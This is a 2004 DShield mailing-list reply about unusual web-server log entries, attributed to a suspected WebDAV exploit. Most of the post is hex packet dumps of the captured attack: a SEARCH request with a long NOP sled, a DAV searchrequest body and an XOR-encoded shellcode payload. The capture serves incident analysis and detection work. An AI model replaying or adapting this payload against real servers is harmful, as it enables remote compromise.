[Dshield] apache access logs

Bill McCarty bmccarty at pt-net.net
Fri Feb 27 04:02:17 GMT 2004


Hi Steven and list,

--On Wednesday, February 25, 2004 7:32 PM -0800 Steven VanDeBogart 
<steve at bob.reno.nv.us> wrote:

> In the last 24-48 hours I have received 3 or 4 requests to my web server
> that I find unusual.
> They read like this from the logs:
>   [25/Feb/2004:09:58:18 -0800]
> "SEARCH/?±±±±±±±±±±±±±±±±±±± ~snip~ ?????" 414 342

This sounds like an attack that I've logged, which I believe corresponds to 
the suspected WebDav exploit mentioned on the Feb. 25 Handler's Diary. It's 
a big stream and has the biggest NOP sled I've ever seen or imagined <g>. 
The Handler's Diary mentions a series of 0x021b, but I see 0x02b1. Close 
enough, I reckon.

The packet capture is too long to post here, but I sent it to Johannes 
yesterday. Some of the more interesting parts follow.

Cheers,


01/26-16:26:30.865602 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:115 TOS:0x0 ID:52669 IpLen:20 DgmLen:576 DF
***A**** Seq: 0xA74AA61  Ack: 0xF9AC40E6  Win: 0xFFFF  TcpLen: 20
53 45 41 52 43 48 20 2F 90 02 B1 02 B1 02 B1 02  SEARCH /........
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02  ................
B1 02 B1 02 B1 02 B1 02                          ........

<snip>

01/26-16:26:34.906384 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:115 TOS:0x0 ID:56812 IpLen:20 DgmLen:576 DF
***A**** Seq: 0xA74B2C1  Ack: 0xF9AC40E6  Win: 0xFFFF  TcpLen: 20
B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 02 B1 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90                          ........

<snip>

01/26-16:27:00.007121 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:115 TOS:0x0 ID:20115 IpLen:20 DgmLen:576 DF
***A**** Seq: 0xA75A9D1  Ack: 0xF9AC40E6  Win: 0xFFFF  TcpLen: 20
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 8B F9 32  ...............2
C0 FE C0 F2 AE FF E7 20 48 54 54 50 2F 31 2E 31  ....... HTTP/1.1
0D 0A 48 6F 73 74 3A 20 XX XX XX XX XX XX XX XX  ..Host: XXXXXXXX
38 33 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65  83..Content-Type
3A 20 74 65 78 74 2F 78 6D 6C 0D 0A 43 6F 6E 74  : text/xml..Cont
65 6E 74 2D 4C 65 6E 67 74 68 3A 20 31 33 39 39  ent-Length: 1399
0D 0A 0D 0A 3C 3F 78 6D 6C 20 76 65 72 73 69 6F  ....<?xml versio
6E 3D 22 31 2E 30 22 3F 3E 0D 0A 3C 67 3A 73 65  n="1.0"?>..<g:se
61 72 63 68 72 65 71 75 65 73 74 20 78 6D 6C 6E  archrequest xmln
73 3A 67 3D 22 44 41 56 3A 22 3E 0D 0A 3C 67 3A  s:g="DAV:">..<g:
73 71 6C 3E 0D 0A 53 65 6C 65 63 74 20 22 44 41  sql>..Select "DA
56 3A 64 69 73 70 6C 61 79 6E 61 6D 65 22 20 66  V:displayname" f
72 6F 6D 20 73 63 6F 70 65 28 29 0D 0A 3C 2F 67  rom scope()..</g
3A 73 71 6C 3E 0D 0A 3C 2F 67 3A 73 65 61 72 63  :sql>..</g:searc
68 72 65 71 75 65 73 74 3E 0D 0A 01 90 90 90 90  hrequest>.......
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 EB 02 EB 05 E8 F9 FF FF FF 5B 31 C9 66  ............[1.f
B9 D8 04 80 73 0E A1 43 E2 F9 48 E3 A0 A1 A1 FA  ....s..C..H.....
F7 F6 F1 9F 2A 12 51 A1 A1 A1 2A 97 28 12 51 A1  ....*.Q...*.(.Q.
A1 A1 9F 2A 12 55 A1 A1 A1 2A 97 28 12 55 A1 A1  ...*.U...*.(.U..
A1 2C 12 3E A1 A1 A1 2C                          .,.>...,

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

01/26-16:27:00.139315 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:115 TOS:0x0 ID:20138 IpLen:20 DgmLen:576 DF
***A**** Seq: 0xA75ABE9  Ack: 0xF9AC40E6  Win: 0xFFFF  TcpLen: 20
1A 65 A1 A1 A1 49 02 A3 A1 A1 28 22 45 A1 A1 A1  .e...I....("E...
2C 1A 6B A1 A1 A1 49 33 A3 A1 A1 28 22 49 A1 A1  ,.k...I3...("I..
A1 2C 1A 74 A1 A1 A1 49 20 A3 A1 A1 28 22 4D A1  .,.t...I ...("M.
A1 A1 2C 12 AB A1 A1 A1 2C 1A B0 A1 A1 A1 49 CB  ..,.....,.....I.
A3 A1 A1 28 22 E0 A1 A1 A1 2C 1A BD A1 A1 A1 49  ...("....,.....I
F8 A3 A1 A1 28 22 E4 A1 A1 A1 2C 1A 82 A1 A1 A1  ....("....,.....
49 E9 A3 A1 A1 28 22 E8 A1 A1 A1 2C 1A 8A A1 A1  I....("....,....
A1 49 96 A3 A1 A1 28 22 EC A1 A1 A1 2C 1A 91 A1  .I....("....,...
A1 A1 49 87 A3 A1 A1 28 22 F0 A1 A1 A1 2C 1A 94  ..I....("....,..
A1 A1 A1 49 B4 A3 A1 A1 28 22 F4 A1 A1 A1 2C 12  ...I....("....,.
F8 A1 A1 A1 2C 1A C1 A1 A1 A1 49 5F A0 A1 A1 28  ....,.....I_...(
22 26 A1 A1 A1 2C 1A C7 A1 A1 A1 49 4C A0 A1 A1  "&...,.....IL...
28 22 2A A1 A1 A1 2C 1A CC A1 A1 A1 49 7D A0 A1  ("*...,.....I}..
A1 28 22 2E A1 A1 A1 2C 1A D5 A1 A1 A1 49 6A A0  .("....,.....Ij.
A1 A1 28 22 32 A1 A1 A1 2C 1A DA A1 A1 A1 49 1B  ..("2...,.....I.
A0 A1 A1 28 22 36 A1 A1 A1 2C 1A 23 A1 A1 A1 49  ...("6...,.#...I
08 A0 A1 A1 28 22 3A A1 A1 A1 F2 49 14 A0 A1 A1  ....(":....I....
FA F9 FE FF 49 DE A2 A1 A1 49 18 5F 5E 5E A1 A1  ....I....I._^^..
A1 A1 F0 93 7F 3C E6 9C D6 D2 93 FE 92 93 A1 F6  .....<..........
F2 E0 F2 D5 C0 D3 D5 D4 D1 A1 D2 CE C2 CA C4 D5  ................
A1 C2 CE CF CF C4 C2 D5 A1 D3 C4 C2 D7 A1 D2 C4  ................
CF C5 A1 C2 CD CE D2 C4 D2 CE C2 CA C4 D5 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 CC D2 D7 C2 D3 D5 A1 C7 CE  ................
D1 C4 CF A1 C7 C2 CD CE D2 C4 A1 C7 D6 D3 C8 D5  ................
C4 A1 CC C4 CC D2 C4 D5 A1 CC C0 CD CD CE C2 A1  ................
C7 D3 C4 C4 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 CA C4 D3  ................
CF C4 CD 92 93 A1 E6 C4 D5 F1 D3 CE C2 E0 C5 C5  ................
D3 C4 D2 D2 A1 ED CE C0 C5 ED C8 C3 D3 C0 D3 D8  ................
E0 A1 F2 CD C4 C4 D1 A1 E4 D9 C8 D5 F5 C9 D3 C4  ................
C0 C5 A1 E2 D3 C4 C0 D5 C4 F1 D3 CE C2 C4 D2 D2  ................
E0 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 DD B1  ................
A1 A0 95 B1 A1 A0 A1 A1                          ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

01/26-16:27:00.184195 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:115 TOS:0x0 ID:20180 IpLen:20 DgmLen:576 DF
***A**** Seq: 0xA75AE01  Ack: 0xF9AC40E6  Win: 0xFFFF  TcpLen: 20
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 E5 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 D6 8A C3 A1 A1 A1  ................
A1 A1 D6 C8 CF C9 CD D1 D1 92 93 8F C4 D9 C4 A1  ................
CE D1 C4 CF A1 B7 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 F0 F6 F7 F7 5E 32 51 A1 A1 A1 F1  .........^2Q....
F8 F6 F0 5E 32 55 A1 A1 A1 FF FE F8 62 F1 19 A1  ...^2U......b...
A5 A1 A1 49 B7 A0 A1 A1 28 22 22 A0 A1 A1 F9 2A  ...I....(""....*
32 22 A0 A1 A1 F3 C9 A0 A0 A1 A1 9F 5E F2 E0 C9  2"..........^...
A7 A1 A1 A1 C9 A0 A1 A1 A1 C9 A3 A1 A1 A1 9F 5E  ...............^
F2 E4 9C 5E 5E 5E 5E AE 25 32 A0 A1 A1 28 22 59  ...^^^^.%2...("Y
A1 A1 A1 F6 F1 F2 2C 32 DE A0 A1 A1 67 A3 B7 F3  ......,2....g...
2C 32 5D A1 A1 A1 C7 66 A3 A3 A1 C7 2A DA A9 C7  ,2]....f....*...
28 DB A3 2A DA A5 28 DB A5 F3 F1 9F 5E F2 E8 9C  (..*..(.....^...
A1 A1 A1 A1 AE 2D F7 A0 A1 A1 FA F9 FE F1 19 A1  .....-..........
B1 A1 A1 49 37 A1 A1 A1 28 22 C1 A0 A1 A1 F9 49  ...I7...(".....I
B1 A1 A1 A1 49 05 A1 A1 A1 49 82 A1 A1 A1 49 4A  ....I....I....IJ
A1 A1 A1 62 C9 A1 A1 A1 A1 C9 A5 A1 A1 A1 2C 32  ...b..........,2
26 A0 A1 A1 F3 2A 32 59 A1 A1 A1 F3 9F 5E F2 EC  &....*2Y.....^..
62 F6 F7 2A 1A 26 A0 A1 A1 2A 12 2A A0 A1 A1 98  b..*.&...*.*....
56 FF FE AE 25 93 A1 A1 A1 C9 A1 A1 A1 A1 C9 A1  V...%...........
B1 A1 A1 2A 32 C1 A0 A1 A1 F3 2A 32 59 A1 A1 A1  ...*2.....*2Y...
F3 9F 5E F2 EC 9C A1 A1 A1 A1 AE 2D 71 A1 A1 A1  ..^........-q...
A0 22 2A A0 A1 A1 48 F1 A1 A1 A1 49 CF A1 A1 A1  ."*...H....I....
F1 2A 22 59 A1 A1 A1 F1 9F 5E F2 F4 F9 62 28 66  .*"Y.....^...b(f
F1 9F 5E 32 36 A1 A1 A1 FE F1 F6 C9 A1 A1 A1 A1  ..^26...........
F1 9F 5E 32 32 A1 A1 A1 FE FE FE F9 62 2C 32 C5  ..^22.......b,2.
A0 A1 A1 F3 2C 32 CD A0 A1 A1 F3 9F 5E 32 26 A1  ....,2......^2&.
A1 A1 FE FE 28 22 C9 A0 A1 A1 62 5E 12 C9 A0 A1  ....("....b^....
A1 F1 C9 A0 A1 A1 A1 2A                          .......*

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

01/26-16:27:00.184980 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1112
***AP*** Seq: 0xF9AC40E6  Ack: 0xA75B019  Win: 0x3C68  TcpLen: 20
1A 65 A1 A1 A1 49 02 A3 A1 A1 28 22 45 A1 A1 A1  .e...I....("E...
2C 1A 6B A1 A1 A1 49 33 A3 A1 A1 28 22 49 A1 A1  ,.k...I3...("I..
A1 2C 1A 74 A1 A1 A1 49 20 A3 A1 A1 28 22 4D A1  .,.t...I ...("M.
A1 A1 2C 12 AB A1 A1 A1 2C 1A B0 A1 A1 A1 49 CB  ..,.....,.....I.
A3 A1 A1 28 22 E0 A1 A1 A1 2C 1A BD A1 A1 A1 49  ...("....,.....I
F8 A3 A1 A1 28 22 E4 A1 A1 A1 2C 1A 82 A1 A1 A1  ....("....,.....
49 E9 A3 A1 A1 28 22 E8 A1 A1 A1 2C 1A 8A A1 A1  I....("....,....
A1 49 96 A3 A1 A1 28 22 EC A1 A1 A1 2C 1A 91 A1  .I....("....,...
A1 A1 49 87 A3 A1 A1 28 22 F0 A1 A1 A1 2C 1A 94  ..I....("....,..
A1 A1 A1 49 B4 A3 A1 A1 28 22 F4 A1 A1 A1 2C 12  ...I....("....,.
F8 A1 A1 A1 2C 1A C1 A1 A1 A1 49 5F A0 A1 A1 28  ....,.....I_...(
22 26 A1 A1 A1 2C 1A C7 A1 A1 A1 49 4C A0 A1 A1  "&...,.....IL...
28 22 2A A1 A1 A1 2C 1A CC A1 A1 A1 49 7D A0 A1  ("*...,.....I}..
A1 28 22 2E A1 A1 A1 2C 1A D5 A1 A1 A1 49 6A A0  .("....,.....Ij.
A1 A1 28 22 32 A1 A1 A1 2C 1A DA A1 A1 A1 49 1B  ..("2...,.....I.
A0 A1 A1 28 22 36 A1 A1 A1 2C 1A 23 A1 A1 A1 49  ...("6...,.#...I
08 A0 A1 A1 28 22 3A A1 A1 A1 F2 49 14 A0 A1 A1  ....(":....I....
FA F9 FE FF 49 DE A2 A1 A1 49 18 5F 5E 5E A1 A1  ....I....I._^^..
A1 A1 F0 93 7F 3C E6 9C D6 D2 93 FE 92 93 A1 F6  .....<..........
F2 E0 F2 D5 C0 D3 D5 D4 D1 A1 D2 CE C2 CA C4 D5  ................
A1 C2 CE CF CF C4 C2 D5 A1 D3 C4 C2 D7 A1 D2 C4  ................
CF C5 A1 C2 CD CE D2 C4 D2 CE C2 CA C4 D5 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 CC D2 D7 C2 D3 D5 A1 C7 CE  ................
D1 C4 CF A1 C7 C2 CD CE D2 C4 A1 C7 D6 D3 C8 D5  ................
C4 A1 CC C4 CC D2 C4 D5 A1 CC C0 CD CD CE C2 A1  ................
C7 D3 C4 C4 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 CA C4 D3  ................
CF C4 CD 92 93 A1 E6 C4 D5 F1 D3 CE C2 E0 C5 C5  ................
D3 C4 D2 D2 A1 ED CE C0 C5 ED C8 C3 D3 C0 D3 D8  ................
E0 A1 F2 CD C4 C4 D1 A1 E4 D9 C8 D5 F5 C9 D3 C4  ................
C0 C5 A1 E2 D3 C4 C0 D5 C4 F1 D3 CE C2 C4 D2 D2  ................
E0 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 DD B1  ................
A1 A0 95 B1 A1 A0 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 E5 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1  ................
A1 A1 D6 8A C3 A1 A1 A1 A1 A1 D6 C8 CF C9 CD D1  ................
D1 92 93 8F C4 D9 C4 A1 CE D1 C4 CF A1 B7 A1 A1  ................
A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 A1 F0 F6 F7  ................
F7 5E 32 51 A1 A1 A1 F1 F8 F6 F0 5E 32 55 A1 A1  .^2Q.......^2U..
A1 FF FE F8 62 F1 19 A1 A5 A1 A1 49 B7 A0 A1 A1  ....b......I....
28 22 22 A0 A1 A1 F9 2A 32 22 A0 A1 A1 F3 C9 A0  (""....*2"......
A0 A1 A1 9F 5E F2 E0 C9 A7 A1 A1 A1 C9 A0 A1 A1  ....^...........
A1 C9 A3 A1 A1 A1 9F 5E F2 E4 9C 5E 5E 5E 5E AE  .......^...^^^^.
25 32 A0 A1 A1 28 22 59 A1 A1 A1 F6 F1 F2 2C 32  %2...("Y......,2
DE A0 A1 A1 67 A3 B7 F3 2C 32 5D A1 A1 A1 C7 66  ....g...,2]....f
A3 A3 A1 C7 2A DA A9 C7 28 DB A3 2A DA A5 28 DB  ....*...(..*..(.
A5 F3 F1 9F 5E F2 E8 9C A1 A1 A1 A1 AE 2D F7 A0  ....^........-..
A1 A1 FA F9 FE F1 19 A1 B1 A1 A1 49 37 A1 A1 A1  ...........I7...
28 22 C1 A0 A1 A1 F9 49 B1 A1 A1 A1 49 05 A1 A1  (".....I....I...
A1 49 82 A1 A1 A1 49 4A A1 A1 A1 62 C9 A1 A1 A1  .I....IJ...b....
A1 C9 A5 A1 A1 A1 2C 32 26 A0 A1 A1 F3 2A 32 59  ......,2&....*2Y
A1 A1 A1 F3 9F 5E F2 EC 62 F6 F7 2A 1A 26 A0 A1  .....^..b..*.&..
A1 2A 12 2A A0 A1 A1 98 56 FF FE AE 25 93 A1 A1  .*.*....V...%...
A1 C9 A1 A1 A1 A1 C9 A1 B1 A1 A1 2A 32 C1 A0 A1  ...........*2...
A1 F3 2A 32 59 A1 A1 A1 F3 9F 5E F2 EC 9C A1 A1  ..*2Y.....^.....
A1 A1 AE 2D 71 A1 A1 A1 A0 22 2A A0 A1 A1 48 F1  ...-q...."*...H.
A1 A1 A1 49 CF A1 A1 A1 F1 2A 22 59 A1 A1 A1 F1  ...I.....*"Y....
9F 5E F2 F4 F9 62 28 66 F1 9F 5E 32 36 A1 A1 A1  .^...b(f..^26...
FE F1 F6 C9 A1 A1 A1 A1 F1 9F 5E 32 32 A1 A1 A1  ..........^22...
FE FE FE F9 62 2C 32 C5 A0 A1 A1 F3 2C 32 CD A0  ....b,2.....,2..
A1 A1 F3 9F 5E 32 26 A1 A1 A1 FE FE 28 22 C9 A0  ....^2&.....("..
A1 A1 62 5E 12 C9 A0 A1 A1 F1 C9 A0 A1 A1 A1 2A  ..b^...........*

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

01/26-16:27:00.192406 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:115 TOS:0x0 ID:20181 IpLen:20 DgmLen:162 DF
***AP*** Seq: 0xA75B019  Ack: 0xF9AC40E6  Win: 0xFFFF  TcpLen: 20
32 C1 A0 A1 A1 F3 9F 5E 32 2E A1 A1 A1 FE FE FE  2......^2.......
FE 48 E2 5E 5E 5E 2A 32 C9 A0 A1 A1 F3 9F 5E 32  .H.^^^*2......^2
2A A1 A1 A1 FE 62 F1 2C 22 AD A0 A1 A1 F1 2C 22  *....b.,".....,"
BD A0 A1 A1 F1 C9 A1 A1 A1 A1 C9 A1 A1 A1 A1 C9  ................
89 A1 A1 A1 C9 A1 A1 A1 A1 C9 A1 A1 A1 A1 C9 A1  ................
A1 A1 A1 2C 22 CD A0 A1 A1 F1 C9 A1 A1 A1 A1 9F  ...,"...........
5E 32 4D A1 A1 A1 F9 62 49 08 5E 5E 5E C9 A1 A1  ^2M....bI.^^^...
A1 A1 5E 32 49 A1 A1 A1 31 A1                    ..^2I...1.

<snip>

01/26-16:27:07.881962 81.50.222.157:4604 -> XXX.XXX.XXX.83:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:162
***AP*** Seq: 0xF9AC4F0B  Ack: 0xA75B094  Win: 0x3E80  TcpLen: 20
32 C1 A0 A1 A1 F3 9F 5E 32 2E A1 A1 A1 FE FE FE  2......^2.......
FE 48 E2 5E 5E 5E 2A 32 C9 A0 A1 A1 F3 9F 5E 32  .H.^^^*2......^2
2A A1 A1 A1 FE 62 F1 2C 22 AD A0 A1 A1 F1 2C 22  *....b.,".....,"
BD A0 A1 A1 F1 C9 A1 A1 A1 A1 C9 A1 A1 A1 A1 C9  ................
89 A1 A1 A1 C9 A1 A1 A1 A1 C9 A1 A1 A1 A1 C9 A1  ................
A1 A1 A1 2C 22 CD A0 A1 A1 F1 C9 A1 A1 A1 A1 9F  ...,"...........
5E 32 4D A1 A1 A1 F9 62 49 08 5E 5E 5E C9 A1 A1  ^2M....bI.^^^...
A1 A1 5E 32 49 A1 A1 A1 31 A1                    ..^2I...1.

---------------------------------------------------
Bill McCarty




More information about the list mailing list